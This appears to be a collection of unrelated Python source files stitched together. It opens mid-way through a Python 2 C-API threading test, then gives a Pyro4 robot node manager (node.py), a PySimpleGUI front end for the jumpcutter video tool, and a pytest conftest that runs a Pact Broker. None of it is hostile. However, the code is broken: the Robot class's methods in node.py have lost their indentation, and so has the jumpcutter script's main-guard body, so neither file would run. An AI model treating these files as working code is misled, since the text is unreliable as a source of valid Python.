        context.n = 2 #submits per thread
        context.nThreads = n // context.n
        context.nFinished = 0
        context.lock = threading.Lock()
        context.event = threading.Event()

        for i in range(context.nThreads):
            t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
            t.start()
            threads.append(t)

        self.pendingcalls_wait(context.l, n, context)

        for t in threads:
            t.join()

    def pendingcalls_thread(self, context):
        # Worker: submit this thread's share, then signal when the last
        # worker finishes so pendingcalls_wait can start its timeout count.
        try:
            self.pendingcalls_submit(context.l, context.n)
        finally:
            with context.lock:
                context.nFinished += 1
                nFinished = context.nFinished
                if False and test_support.verbose:
                    print "finished threads: ", nFinished
        if nFinished == context.nThreads:
            context.event.set()

    def test_pendingcalls_non_threaded(self):
        #again, just using the main thread, likely they will all be dispatched at
        #once. It is ok to ask for too many, because we loop until we find a slot.
        #the loop can be interrupted to dispatch.
        #there are only 32 dispatch slots, so we go for twice that!
        l = []
        n = 64
        self.pendingcalls_submit(l, n)
        self.pendingcalls_wait(l, n)
@unittest.skipUnless(threading and thread, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
    # Exercises _testcapi._test_thread_state, both on the main thread and on
    # a freshly created thread.  (Python 2 test module.)

    @test_support.reap_threads
    def test_thread_state(self):
        # some extra thread-state tests driven via _testcapi
        def target():
            idents = []

            def callback():
                idents.append(thread.get_ident())

            _testcapi._test_thread_state(callback)
            a = b = callback
            time.sleep(1)
            # Check our main thread is in the list exactly 3 times.
            self.assertEqual(idents.count(thread.get_ident()), 3,
                             "Couldn't find main thread correctly in the list")

        target()
        t = threading.Thread(target=target)
        t.start()
        t.join()
def test_main():
    # Run every test_* function _testcapi exports, then the unittest classes
    # defined above.  (Python 2 test module.)
    for name in dir(_testcapi):
        if name.startswith('test_'):
            test = getattr(_testcapi, name)
            if test_support.verbose:
                print "internal", name
            try:
                test()
            except _testcapi.error:
                raise test_support.TestFailed, sys.exc_info()[1]

    test_support.run_unittest(TestPendingCalls, TestThreadState)
# Python 2 test-module entry point
if __name__ == "__main__":
    test_main()
|
node.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ____________developed by paco andres____________________
# ________in collaboration with cristian vazquez _________
import os
import time
from node.libs import config, control, utils, uriresolver
from multiprocessing import Process, Pipe, Queue
import threading
import traceback
import Pyro4
from termcolor import colored
import setproctitle
from node.libs.inspection import inspecting_modules
import pprint
# show_warnings(_modules_libs_errors)
# Maximum retry counts used while resolving local and remote dependencies
_LOCAL_TRYS = 5
_REMOTE_TRYS = 5
# Discover every class available under node.libs plus any import errors
_classes_lib, _modules_libs_errors = inspecting_modules("node.libs")
def import_class(services, components):
    """ Import necessary packages for Robot

    Each entry of *services* and *components* is a (module, class) pair;
    the classes are injected into this module's globals() so later code
    (e.g. Robot.start_pyro4bot_object) can look them up by name.  Exits
    the process if any import fails.
    """
    print(colored("\n____________IMPORTING CLASS FOR ROBOT______________________",
                  'yellow'))
    print(" SERVICES:")
    _import_pairs(services)
    print(" COMPONENTS:")
    _import_pairs(components)
    print("")


def _import_pairs(pairs):
    """Import every (module, cls) pair into globals(), aborting on failure.

    Factored out of import_class, which previously duplicated this loop
    for services and components.
    """
    for module, cls in pairs:
        try:
            print(colored(" FROM {} IMPORT {}".format(module, cls), "cyan"))
            # NOTE(review): exec on config-provided names; consider
            # importlib.import_module + getattr if the config is untrusted.
            exec("from {} import {}".format(module, cls), globals())
        except Exception:
            print("ERROR IMPORTING CLASS: {} FROM MODULE {}".format(cls, module))
            traceback.print_exc()
            # BUG FIX: exit with a non-zero status on failure
            # (was exit(0), which signals success to the caller)
            exit(1)
class Robot(control.Control):
"""Main class Manage the robot."""
def __init__(self):
    super(Robot, self).__init__()
    # Dictionary of components:
    # name -> [pyro4id, Process, pid, remote-status, docstring]
    # (entries appended by pre_start_pyro4bot_object)
    self.PROCESS = {}
    # Import objects needed to instantiate components
    import_class(*self.imports)
    # Resolution of URIs for Pyro
    self.URI_proxy = None  # URIProxy for internal uri resolver
    self.URI_uri = None  # Just URI for the resolver (set by load_uri_resolver)
    self.URI_object = self.load_uri_resolver()  # Object resolver location
def load_uri_resolver(self):
    """Load the URIs resolver on main node.

    Registers a uriresolver for this node, stores its URI and a proxy to it
    on the instance, and returns the resolver object itself.
    """
    uri_r = uriresolver.uriresolver(self.node,
                                    password=self.node["password"])
    self.URI_uri, self.URI_proxy = uri_r.register_uriresolver()
    return uri_r
def start_components(self):
    """Launcher of node components: starts services first, then components."""
    for banner, parts, order in (("SERVICES", self.services, self.services_order),
                                 ("COMPONENTS", self.components, self.components_order)):
        # Decorative tree lines in the console output
        print(colored("\t|", "yellow"))
        print(colored("\t|", "yellow"))
        print(colored("\t+-----> %s" % banner, "yellow"))
        self.load_objects(parts, order)
def load_objects(self, parts, object_robot):
    """Execute the components or services of the node.

    First seeds every object with retry budgets and unresolved-dependency
    lists, aborts if any hard class requirement is missing, then repeatedly
    pops names from *object_robot*, re-checking dependencies and re-queueing
    objects that must still wait, until the list is drained.
    """
    # Seed retry counters and working copies of the dependency lists
    for k in object_robot:
        parts[k]["_local_trys"] = _LOCAL_TRYS
        parts[k]["_remote_trys"] = _REMOTE_TRYS
        parts[k]["_services_trys"] = _LOCAL_TRYS
        parts[k]["_unresolved_locals"] = list(parts[k].get("_locals", []))
        parts[k]["_unr_remote_deps"] = list(
            parts[k].get("_resolved_remote_deps", []))
        parts[k]["_unresolved_services"] = list(
            parts[k].get("_services", []))
        parts[k]["_non_required"] = self.check_requireds(parts[k])
    # Abort the whole node if any class requirement cannot be fulfilled
    errors = False
    for k in object_robot:
        if parts[k]["_non_required"]:
            print(colored("ERROR: class {} require {} for {} ".
                          format(parts[k]["cls"], parts[k]["_non_required"], k), "red"))
            errors = True
    if errors:
        exit()
    # Round-robin scheduling: WAITing objects are re-appended to the queue
    while object_robot != []:
        k = object_robot.pop(0)
        st_local, st_remote, st_service = self.check_deps(k, parts[k])
        if st_local == "ERROR":
            print("\t\t[%s] NOT STARTING %s Error in locals %s" % (
                colored(st_local, 'red'), k, parts[k]["_unresolved_locals"]))
            continue
        if "ERROR" in st_remote:
            print("\t\t[{}] {} {} --> {}".format(
                colored("ERROR", 'red'),
                colored("NOT STARTING:", 'red'),
                k,
                colored("".join(parts[k]["_unr_remote_deps"]), 'red')))
            continue
        if st_service == "ERROR":
            print("\t\t[%s] NOT STARTING %s Error in service %s" % (
                colored(st_remote, 'red'), k, parts[k]["_unresolved_services"]))
            continue
        if st_local == "WAIT" or st_remote == "WAIT" or st_service == "WAIT":
            object_robot.append(k)
            continue
        # All dependencies resolved (st_remote may be "WAITING"/"ASYNC";
        # that status is preserved in _REMOTE_STATUS for the starter)
        if st_local == "OK" and st_service == "OK":
            parts[k].pop("-->", None)
            parts[k]["_REMOTE_STATUS"] = st_remote
            # Drop the bookkeeping fields before handing off the object
            del (parts[k]["_unresolved_locals"])
            del (parts[k]["_local_trys"])
            del (parts[k]["_unresolved_services"])
            del (parts[k]["_services_trys"])
            del (parts[k]["_remote_trys"])
            self.pre_start_pyro4bot_object(k, parts[k])
def check_deps(self, k, obj):
    """Re-evaluate local, remote and service dependencies for component *k*.

    Resets the resolved-dependency accumulators on *obj*, runs the three
    dependency checks, and returns their status strings as
    (local, remote, service).
    """
    # Fresh accumulators; the check_* helpers append resolved URIs here.
    for field in ("_locals", "_resolved_remote_deps", "_services"):
        obj[field] = []
    local_status = self.check_local_deps(obj)
    service_status = self.check_service_deps(obj)
    remote_status = self.check_remotes(k, obj)
    return local_status, remote_status, service_status
def check_local_deps(self, obj):
    """Check the local dependencies of the robot.

    Resolves unresolved local dependencies through the URI proxy; stops at
    the first unavailable one, returning "WAIT" (retry later) or "ERROR"
    once the retry budget is exhausted.  Returns "OK" when all resolve.
    """
    for dep in obj["_unresolved_locals"]:
        uri = self.URI_proxy.wait_local_available(dep, self.node["password"])
        if uri is None:
            # Unavailable: burn one retry and stop scanning
            obj["_local_trys"] -= 1
            return "ERROR" if obj["_local_trys"] < 0 else "WAIT"
        obj["_locals"].append(uri)
    return "OK"
def check_service_deps(self, obj):
    """Check the services dependencies of the robot.

    Mirrors check_local_deps but for service dependencies: resolves each
    unresolved service via the URI proxy, stopping at the first unavailable
    one with "WAIT" (retry later) or "ERROR" when out of retries.
    """
    for dep in obj["_unresolved_services"]:
        uri = self.URI_proxy.wait_local_available(dep, self.node["password"])
        if uri is None:
            # Unavailable: burn one retry and stop scanning
            obj["_services_trys"] -= 1
            return "ERROR" if obj["_services_trys"] < 0 else "WAIT"
        obj["_services"].append(uri)
    return "OK"
def check_remotes(self, k, obj):
    """Check the remotes dependencies of the robot.

    Asks the URI resolver about each still-unresolved remote dependency and
    returns one of "OK", "WAIT", "WAITING", "ERROR", "ASYNC" or
    "UNKNOWN-ERROR" (the status of the last dependency examined).
    """
    check_remote = "OK"
    for d in obj["_unr_remote_deps"]:
        msg, uri = self.URI_proxy.wait_resolv_remotes(d, k)
        if "WAIT" == msg:
            obj["_remote_trys"] -= 1
            if obj["_remote_trys"] < 0:
                # Retry budget exhausted.
                # NOTE(review): "WAITING" is NOT treated as "WAIT" by
                # load_objects, so the component proceeds to start with
                # this status recorded -- confirm intended.
                check_remote = "WAITING"
            else:
                check_remote = "WAIT"
                time.sleep(1)
        elif "ERROR" == msg:
            check_remote = "ERROR"
            obj["_remote_trys"] = 0
        elif "SYNC" == msg:
            # Dependency resolved synchronously: record its URI
            print("\t\t" + colored("*REMOTE-URI", 'green') + ":{} for comp:{}".format(uri, d))
            check_remote = "OK"
            obj["_remote_trys"] = 0
            obj["_resolved_remote_deps"].append(uri)
            # NOTE(review): this removes from the list currently being
            # iterated, which skips the following element -- confirm.
            if d in obj["_unr_remote_deps"]:
                obj["_unr_remote_deps"].remove(d)
        elif "ASYNC" == msg:
            check_remote = "ASYNC"
            obj["_remote_trys"] = 0
        else:
            check_remote = "UNKNOWN-ERROR"
            obj["_remote_trys"] = 0
    return check_remote
def pre_start_pyro4bot_object(self, name, obj):
    """Pre starter for component.

    Allocates a Pyro4 URI for *name*, fills the object's runtime fields,
    launches start_pyro4bot_object in a child Process, then polls the new
    object's proxy until it reports a status (or retries run out) and
    prints the result.  Does nothing if *name* was already started.
    """
    serv_pipe, client_pipe = Pipe()
    attemps = 5
    if "_locals" not in obj:
        obj["_locals"] = []
    if "_resolved_remote_deps" not in obj:
        obj["_resolved_remote_deps"] = []
    if name not in self.PROCESS:
        self.PROCESS[name] = []
        obj["pyro4id"] = self.URI_proxy.new_uri(name, obj["mode"])
        obj["name"] = name
        obj["node"] = self.uri_node
        obj["uriresolver"] = self.URI_uri
        obj["tty_out"] = self.node["tty_out"]
        obj["tty_err"] = self.node["tty_err"]
        obj["tty_node"] = utils.get_tty()
        # PROCESS[name] layout: [pyro4id, Process, pid, remote-status, doc]
        self.PROCESS[name].append(obj["pyro4id"])
        self.PROCESS[name].append(
            Process(name=name, target=self.start_pyro4bot_object, args=(obj, client_pipe)))
        self.PROCESS[name][1].start()
        self.PROCESS[name].append(self.PROCESS[name][1].pid)
        self.PROCESS[name].append(obj["_REMOTE_STATUS"])
        # Handshake: the child sends "CONTINUE" or "FAIL" once its Pyro4
        # daemon is created.  The value is discarded -- the recv only
        # synchronizes; the real status is polled through the proxy below.
        status = serv_pipe.recv()
        status = "FAIL"
        while attemps > 0:
            try:
                pxy = utils.get_pyro4proxy(
                    obj["pyro4id"], self.node["name"])
                status = pxy.get_status()
                break
            except Exception:
                attemps -= 1
                time.sleep(1)
        # Colorize by status; note st stays unset for "ASYNC", whose branch
        # below does not use it
        if status == "OK":
            st = colored(status, 'green')
            self.PROCESS[name].append(pxy.__docstring__())
        if status == "FAIL":
            st = colored(status, 'red')
        if status == "WAITING":
            st = colored(status, 'yellow')
        if status == "ASYNC":
            print("\t\t[%s] STARTING %s --> remotes dependencies in asynchronous mode with --> %s" % (
                colored(status, 'yellow'), name, colored(' '.join(obj["_unr_remote_deps"]), 'yellow')))
        else:
            # NOTE(review): assumes get_status() only ever returns one of
            # OK/FAIL/WAITING/ASYNC; any other value would leave st unbound
            print("\t\t[%s] STARTING %s" % (st, obj["pyro4id"]))
    else:
        print("ERROR: " + name + " is running")
def start_pyro4bot_object(self, d, proc_pipe):
    """Start PYRO4BOT component.

    Runs in a child process: creates a Pyro4 daemon for the component,
    instantiates its class (looked up in module globals, where
    import_class put it), registers it, exposes its methods, and serves
    requests until the daemon loop exits.  Reports "CONTINUE" or "FAIL"
    back through *proc_pipe*.
    """
    (name_ob, ip, ports) = utils.uri_split(d["pyro4id"])
    try:
        # Daemon proxy for sensor
        daemon = Pyro4.Daemon(
            host=ip, port=utils.get_free_port(ports, ip=ip))
        daemon._pyroHmacKey = self.node["password"].encode()
        # Unblock the parent's handshake recv
        proc_pipe.send("CONTINUE")
        deps = utils.prepare_proxys(d, self.node["password"])
        # assigning tty out and err for object
        default_tty = utils.get_tty()
        utils.set_tty_err(d["tty_err"])
        # Preparing class for pyro4
        pyro4bot_class = control.Pyro4bot_Loader(
            globals()[d["cls"]], **deps)
        new_object = pyro4bot_class()
        # Associate object to the daemon
        uri = daemon.register(new_object, objectId=name_ob)
        # Get and save exposed methods
        exposed = Pyro4.core.DaemonObject(
            daemon).get_metadata(name_ob, True)
        # Hide methods from Control
        safe_exposed = {}
        for k in exposed.keys():
            safe_exposed[k] = list(
                set(exposed[k]) - set(dir(control.Control)))
        safe_exposed["methods"].extend(["__docstring__", "__exposed__"])
        new_object.exposed.update(safe_exposed)
        setproctitle.setproctitle("PYRO4BOT." + name_ob)
        # Save docstring documentation inside sensor object
        new_object.docstring.update(
            self.get_docstring(new_object, safe_exposed))
        # Blocks until the daemon is shut down
        daemon.requestLoop()
        # getting tty default to exit
        utils.set_tty_out(default_tty)
        utils.set_tty_err(default_tty)
        print("[%s] Shutting %s" %
              (colored("Down", 'green'), d["pyro4id"]))
    except Exception as e:
        proc_pipe.send("FAIL")
        print("ERROR: creating sensor robot object: " + d["pyro4id"])
        print(utils.format_exception(e))
def get_docstring(self, new_object, exposed):
    """Return doc_string documentation in methods_and_docstring.

    Builds a mapping of exposed method name -> its __doc__ string for the
    "methods" and "oneway" entries of *exposed*, skipping anything that is
    part of the base Control interface.
    """
    docstring = {}
    # Hoisted out of the loop: the Control member list never changes here
    control_members = dir(control.Control)
    for key in [x for x in exposed.keys() if x in ["methods", "oneway"]]:
        for m in exposed[key]:
            if m not in control_members:  # Exclude control methods
                # BUG FIX: use getattr instead of eval-ing a constructed
                # expression -- identical result, no code-injection risk
                # should a method name ever contain unexpected characters.
                docstring[m] = getattr(new_object, m).__doc__
    return docstring
def get_class_REQUIRED(self, cls):
    """Return a list of requirements if cls has __REQUIRED class attribute.

    *cls* is a class NAME; the class object lives in this module's globals
    (injected by import_class).  "_<cls>__REQUIRED" is the name-mangled
    form of the class's private __REQUIRED attribute.  Returns [] when the
    class or the attribute is missing.
    """
    try:
        # Idiom fix: direct globals() lookup instead of eval-ing a
        # constructed expression -- same semantics, no eval.
        return globals()[cls].__dict__["_{0}__REQUIRED".format(cls)]
    except Exception:
        return []
def check_requireds(self, obj):
    """
    For a given obj this method calc requirements class and
    get unfulfilled requirements for an obj
    inside _service and _local find on left side string.

    Returns the list of requirement names that are satisfied neither by a
    connector (matched on its component part) nor by a key / resolved
    remote dependency of *obj*.
    """
    requireds = self.get_class_REQUIRED(obj["cls"])
    connectors = obj.get("_services", []) + obj.get("_locals", [])
    keys = list(obj.keys()) + obj.get("_resolved_remote_deps", [])
    # Connector names are presumably "robot.component"; compare against the
    # component part (index 1) -- confirm format against uriresolver.
    unfulfilled = [req for req in requireds if req not in
                   [con.split(".")[1] for con in connectors] + keys]
    return unfulfilled
def register_node(self):
    """Register main node on nameserver.

    Delegates to the URI resolver proxy using this node's own URI.
    """
    self.URI_proxy.register_robot_on_nameserver(self.uri_node)
# Exposed methods (Publics)
@Pyro4.expose
def get_uris(self, node=False):
    """Return the URI of all the components of the robot.

    :param node: forwarded to the resolver's list_uris
        (presumably True includes the node itself -- confirm).
    """
    return self.URI_proxy.list_uris(node)
@Pyro4.expose
def get_name_uri(self, name):
    """Return the URI of the given name as a component.
    @name: string.
    Follow the following format: "robotname.component"

    Returns a (uri, status) pair, or (None, "Not found") for an
    unknown component.
    """
    # Guard clause for unknown components
    if name not in self.PROCESS:
        return None, "Not found"
    return self.URI_proxy.get_uri(name), self.PROCESS[name][3]
@Pyro4.expose
def shutdown(self):
    """Terminate every component process managed by this node."""
    print(colored("____STOPPING PYRO4BOT %s_________" %
                  self.node["name"], "yellow"))
    for k, v in self.PROCESS.items():
        # Idiom fix: the previous ``try/except Exception: raise`` wrapper
        # was a no-op; terminate() is called directly, and any error still
        # propagates exactly as before.
        v[1].terminate()
        print("[{}] {}".format(colored("Down", 'green'), v[0]))
@Pyro4.expose
def print_process(self, onlyChanges=False):
    """Refresh and print the status of every managed component process.

    :param onlyChanges: when True, only print rows whose status changed
        since the previous poll.
    """
    for k, v in self.PROCESS.items():
        # Update status (v[3]); an unreachable proxy counts as FAIL
        try:
            old_status = v[3]
            v[3] = utils.get_pyro4proxy(
                v[0], self.node["name"]).get_status()
        except Exception:
            v[3] = "FAIL"
        if (onlyChanges and v[3] != old_status) or not onlyChanges:
            if v[3] == "OK":
                st = colored(v[3], 'green')
            elif v[3] == "FAIL":
                st = colored(v[3], 'red')
            elif v[3] == "WAITING" or v[3] == "ASYNC":
                st = colored(v[3], 'yellow')
            else:
                # Robustness fix: an unexpected status used to leave ``st``
                # unbound and raise NameError here; print it uncolored.
                st = str(v[3])
            print("[{}]\t{} {}".format(
                st, str(v[2]), str(v[0]).rjust(60, ".")))
@Pyro4.expose
def status_changed(self):
    # Convenience wrapper: print only the components whose status changed
    self.print_process(onlyChanges=True)
@Pyro4.expose
def My_Pid(self):
    # Debug helper: dump the raw PROCESS bookkeeping table.
    # NOTE(review): name violates snake_case but is part of the exposed
    # Pyro4 API, so it is kept for compatibility.
    print(self.PROCESS)
|
jumpcutter_gui_threaded.py | import PySimpleGUI as sg
import subprocess
import sys
import threading
print(sg.version)
help_text = \
"""
Jumpcutter GUI
This is a front-end GUI for a command line tool named jumpcutter.
jumpcutter is a command line based tool written by Carykh. You'll find the repo here:
https://github.com/carykh/jumpcutter
The design of this GUI was made in a way that should not have required any changes to the
jumpcutter.py file. However, there appears to be a bug in the original code. The sample rate
argument was specified as a float, but this later causes a crash in the program, so a single
change was made to line 68, changing the parameter from a float to an int. You can get around
this change by not specifying a default value in this GUI. Rather than specifying 44100, leave it blank
which will cause the parameter to be skipped.
This kind of GUI can be applied to a large number of other commandline programs.
NOTE - it has not yet been tested on Linux. It's only been tested on Windows. Hoping to get it
tested out on Linux shortly.
KNOWN Problem - filenames with spaces. Working on it. For now, make a temp folder and make sure everything
has no spaces and you'll be fine. YouTube download wasn't working on the video I tried
Copyright 2020 PySimpleGUI.org
"""
version = '24 May 2021'
def FText(text, in_key=None, default=None, tooltip=None, input_size=None, text_size=None):
    """
    A "User Defined Element": returns one layout row containing a
    right-justified Text label plus an Input element.  Sizes fall back to
    (20, 1) when not supplied.  Parameters are named on purpose (no
    **kwargs) so call sites stay explicit.
    """
    input_size = (20, 1) if input_size is None else input_size
    text_size = (20, 1) if text_size is None else text_size
    label = sg.Text(text, size=text_size, justification='r', tooltip=tooltip)
    entry = sg.Input(default_text=default, key=in_key, size=input_size, tooltip=tooltip)
    return [label, entry]
'''
M""""""""M dP dP
Mmmm mmmM 88 88
MMMM MMMM 88d888b. 88d888b. .d8888b. .d8888b. .d888b88
MMMM MMMM 88' `88 88' `88 88ooood8 88' `88 88' `88
MMMM MMMM 88 88 88 88. ... 88. .88 88. .88
MMMM MMMM dP dP dP `88888P' `88888P8 `88888P8
MMMMMMMMMM
'''
def the_thread(window: sg.Window, sp: subprocess.Popen):
    """
    Worker thread: drains the subprocess's stdout and then stderr,
    forwarding every line to the GUI thread as '-THREAD-' events so the
    window stays responsive while the command runs.
    :param window: the GUI window to post events to
    :param sp: the running subprocess whose output is collected
    :return:
    """
    post = window.write_event_value
    post('-THREAD-', (sp, '===THEAD STARTING==='))
    # Same drain loop for both streams, banner first
    for banner, stream in (('----- STDOUT Follows ----', sp.stdout),
                           ('----- STDERR ----', sp.stderr)):
        post('-THREAD-', (sp, banner))
        for raw in stream:
            post('-THREAD-', (sp, raw.decode().rstrip()))
    post('-THREAD-', (sp, '===THEAD DONE==='))
def main():
    """
    Build the Jump Cutter GUI and run its event loop.

    This version of the GUI uses one large dictionary (input_defintion) to
    drive 100% of the creation of the parameter-collection layout.  The
    event loop assembles a jumpcutter.py command line from the inputs and
    runs it either blocking ('Start') or on a background thread
    ('Threaded').
    """
    # The definition of the GUI. Defines:
    # PSG Input Key
    # Tuple of items needed to build a line in the layout
    # 0 - The command line's parameter
    # 1 - The text to display next to input
    # 2 - The default value for the input
    # 3 - Size of input field (None for default)
    # 4 - Tooltip string
    # 5 - List of additional elements to include on the same row
    input_defintion = {
        '-FILE-': ('--input_file', 'Input File', '', (40, 1), 'the video file you want modified', [sg.FileBrowse()]),
        '-URL-': ('--url', 'URL (not yet working)', '', (40, 1), 'A youtube url to download and process', []),
        '-OUT FILE-': ('--output_file', 'Output File', '', (40, 1), "the output file. (optional. if not included, it'll just modify the input file name)", [sg.FileSaveAs()]),
        '-SILENT THRESHOLD-': ('--silent_threshold', 'Silent Threshold', 0.03, None,
                               "the volume amount that frames' audio needs to surpass to be consider \"sounded\". It ranges from 0 (silence) to 1 (max volume)", []),
        '-SOUNDED SPEED-': ('--sounded_speed', 'Sounded Speed', 1.00, None, "the speed that sounded (spoken) frames should be played at. Typically 1.", []),
        '-SILENT SPEED-': ('--silent_speed', 'Silent Speed', 5.00, None, "the speed that silent frames should be played at. 999999 for jumpcutting.", []),
        '-FRAME MARGIN-': ('--frame_margin', 'Frame Margin', 1, None,
                           "some silent frames adjacent to sounded frames are included to provide context. How many frames on either the side of speech should be included? That's this variable.",
                           []),
        '-SAMPLE RATE-': ('--sample_rate', 'Sample Rate', 44100, None, "sample rate of the input and output videos", []),
        '-FRAME RATE-': (
            '--frame_rate', 'Frame Rate', 25, None, "frame rate of the input and output videos. optional... I try to find it out myself, but it doesn't always work.", []),
        '-FRAME QUALITY-': ('--frame_quality', 'Frame Quality', 3, None, "quality of frames to be extracted from input video. 1 is highest, 31 is lowest, 3 is the default.", [])
    }

    # the command that will be invoked with the parameters
    # NOTE(review): the second assignment deliberately overrides the first
    command_to_run = r'python A:\TEMP2020\jumpcutter\jumpcutter.py '
    command_to_run = r'A:\TEMP2020\jumpcutter\jumpcutter.py '

    def build_command(values):
        """Assemble the full command line from the current input values.

        Shared by the 'Start' and 'Threaded' handlers (this loop used to be
        duplicated in both branches).  File parameters are quoted so paths
        with spaces survive the shell.
        """
        parms = ''
        for key in values:
            if key not in input_defintion:  # skip non-parameter keys (checkbox etc.)
                continue
            if values[key] != '':
                if 'file' in input_defintion[key][0]:
                    parms += f'{input_defintion[key][0]} "{values[key]}" '
                else:
                    parms += f"{input_defintion[key][0]} {values[key]} "
        return command_to_run + parms

    def announce_start():
        """Warn the user that the (long) conversion has begun."""
        sg.popup_quick_message('Beginning conversion... this will take a long time... your window may appear',
                               'like it is not responding, but it will continue to be ruuning.',
                               'Do not close the window. You will see a red colored "DONE" message in the',
                               'Command Line Output area once the conversion has completed', line_width=90, keep_on_top=True, background_color='red', text_color='white',
                               auto_close_duration=4)

    def announce_done():
        """Show the big DONE banner, ding three times, then pop up a notice."""
        sg.cprint('*' * 20 + 'DONE' + '*' * 20, background_color='red', text_color='white')
        window.ding()
        window.ding()
        window.ding()
        sg.popup('*' * 20 + 'DONE' + '*' * 20, title='Completed Jumpcutting!', background_color='red', text_color='white', keep_on_top=True)

    # Find longest input description which is index 1 in table
    text_len = max([len(input_defintion[key][1]) for key in input_defintion])

    # Top part of layout that's not table driven
    layout = [[sg.Text('Jump Cutter - Compress Silence in a Video', font='Any 20')]]

    # Computed part of layout that's based on the dictionary of attributes (the table driven part)
    for key in input_defintion:
        layout_def = input_defintion[key]
        line = FText(layout_def[1], in_key=key, default=layout_def[2], tooltip=layout_def[4], input_size=layout_def[3], text_size=(text_len, 1))
        if layout_def[5] != []:
            line += layout_def[5]
        layout += [line]

    # Bottom part of layout that's not table driven
    layout += [[sg.Text('Constructed Command Line:')],
               [sg.Text(size=(80, 4), key='-COMMAND LINE-', text_color='yellow', font='Courier 8')],
               [sg.Text('Command Line Output:')],
               [sg.Multiline(size=(80, 10), reroute_stdout=True, reroute_stderr=False, reroute_cprint=True, write_only=True, font='Courier 8', autoscroll=True, key='-ML-')],
               [sg.Button('Start'), sg.B('Threaded'), sg.Button('Clear All'), sg.Button('PyCharm Me'), sg.Button('Help'), sg.Button('Exit'),
                sg.Checkbox('Test Mode (Do not run command line)', key='-CBOX-')],
               [sg.Text(f'Version = {version} PySimpleGUI Version {sg.version.split(" ")[0]}', font='Any 8', text_color='yellow')]]

    window = sg.Window('Jump Cutter', layout, finalize=True, )  # adding finalize in case a print is added later before read

    while True:
        event, values = window.read()
        if event in (sg.WIN_CLOSED, 'Exit'):  # if window was closed
            break
        elif event == '-THREAD-':
            # Event payload is (Popen handle, text line) posted by the_thread
            line = values['-THREAD-'][1]
            sg.cprint(line)
            if line == '===THEAD DONE===':
                sg.cprint(f'Completed', c='white on green')
                announce_done()
        elif event == 'Start':  # run the conversion, blocking this thread
            command = build_command(values)
            window['-COMMAND LINE-'].update(command)
            if not values['-CBOX-']:
                announce_start()
                runCommand(cmd=command, window=window)
                announce_done()
        elif event == 'Threaded':  # run the conversion on a background thread
            command = build_command(values)
            window['-COMMAND LINE-'].update(command)
            if not values['-CBOX-']:
                announce_start()
                sp = sg.execute_command_subprocess('python', command, pipe_output=True)
                threading.Thread(target=the_thread, args=(window, sp), daemon=True).start()
                sg.cprint('THEAD STARTED!')
        elif event == 'Clear All':  # if clearing, erase all elements except buttons
            # Will cause some heads to explode 👍🏻
            _ = [window[elem].update('') for elem in values if window[elem].Type != sg.ELEM_TYPE_BUTTON]
        elif event == 'PyCharm Me':  # edit this file using PyCharm
            sg.execute_editor(__file__)
        elif event == 'Help':  # display the "help text" (comment header at top of program)
            sg.popup(help_text, line_width=len(max(help_text.split('\n'), key=len)))

    window.close()
def runCommand(cmd, timeout=None, window=None):
    """ Launch a shell command without waiting for it to finish
    @param cmd: command to execute
    @param timeout: unused; kept for API compatibility
    @param window: unused; kept for API compatibility
    @return: the subprocess.Popen object (stderr is merged into stdout)
    """
    # NOTE(review): the extra quotes around cmd make a POSIX shell treat the
    # whole command as one token; this appears targeted at Windows -- confirm.
    p = subprocess.Popen(f'"{cmd}"', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return p
if __name__ == '__main__':
sg.theme('Dark Grey 9')
main() |
conftest.py | import pathlib
import sys
from multiprocessing import Process
import docker
import pytest
from testcontainers.compose import DockerCompose
from .pact_provider import run_server
@pytest.fixture(scope="module")
def server():
    """Run the pact provider in a background daemon process for the module."""
    provider = Process(target=run_server, args=(), daemon=True)
    provider.start()
    yield provider
    # Cleanup after test: Process.kill is new in 3.7; otherwise terminate
    stop = provider.kill if sys.version_info >= (3, 7) else provider.terminate
    stop()
def pytest_addoption(parser):
    """Register the custom command line options used by these tests."""
    parser.addoption(
        "--publish-pact", type=str, action="store", help="Upload generated pact file to pact broker with version"
    )
    # NOTE(review): type=bool with action="store" means ANY non-empty string
    # (including "False") parses as True -- confirm this is intended.
    parser.addoption("--run-broker", type=bool, action="store", help="Whether to run broker in this test or not.")
@pytest.fixture(scope="session", autouse=True)
def publish_existing_pact(broker):
    """Publish the contents of the pacts folder to the Pact Broker.
    In normal usage, a Consumer would publish Pacts to the Pact Broker after
    running tests - this fixture would NOT be needed.
    .
    Because the broker is being used standalone here, it will not contain the
    required Pacts, so we must first spin up the pact-cli and publish them.
    In the Pact Broker logs, this corresponds to the following entry:
    PactBroker::Pacts::Service -- Creating new pact publication with params \
    {:consumer_name=>"UserServiceClient", :provider_name=>"UserService", \
    :revision_number=>nil, :consumer_version_number=>"1", :pact_version_sha=>nil, \
    :consumer_name_in_pact=>"UserServiceClient", :provider_name_in_pact=>"UserService"}
    """
    # Mount the local pacts folder into the pact-cli container
    source = str(pathlib.Path.cwd().joinpath("..", "pacts").resolve())
    pacts = [f"{source}:/pacts"]
    envs = {
        "PACT_BROKER_BASE_URL": "http://broker_app:9292",
        "PACT_BROKER_USERNAME": "pactbroker",
        "PACT_BROKER_PASSWORD": "pactbroker",
    }
    client = docker.from_env()
    print("Publishing existing Pact")
    # Run the pact-cli container on the broker's compose network and publish
    # the mounted pacts as consumer-app version 1
    client.containers.run(
        remove=True,
        network="broker_default",
        volumes=pacts,
        image="pactfoundation/pact-cli:latest",
        environment=envs,
        command="publish /pacts --consumer-app-version 1",
    )
    print("Finished publishing")
# This fixture is to simulate a managed Pact Broker or Pactflow account.
# For almost all purposes outside this example, you will want to use a real
# broker. See https://github.com/pact-foundation/pact_broker for further details.
@pytest.fixture(scope="session", autouse=True)
def broker(request):
    """Provide a Pact Broker for the session.

    Only starts a docker-compose broker when --publish-pact AND --run-broker
    are both given; otherwise either nothing is needed (no publish) or an
    already-running broker is assumed.
    """
    version = request.config.getoption("--publish-pact")
    publish = True if version else False
    # If the results are not going to be published to the broker, there is
    # nothing further to do anyway
    if not publish:
        yield
        return
    run_broker = request.config.getoption("--run-broker")
    if run_broker:
        # Start up the broker using docker-compose
        print("Starting broker")
        with DockerCompose("../broker", compose_file_name=["docker-compose.yml"], pull=True) as compose:
            stdout, stderr = compose.get_logs()
            if stderr:
                print("Errors\\n:{}".format(stderr))
            print("{}".format(stdout))
            print("Started broker")
            # Keep the broker up for the whole test session
            yield
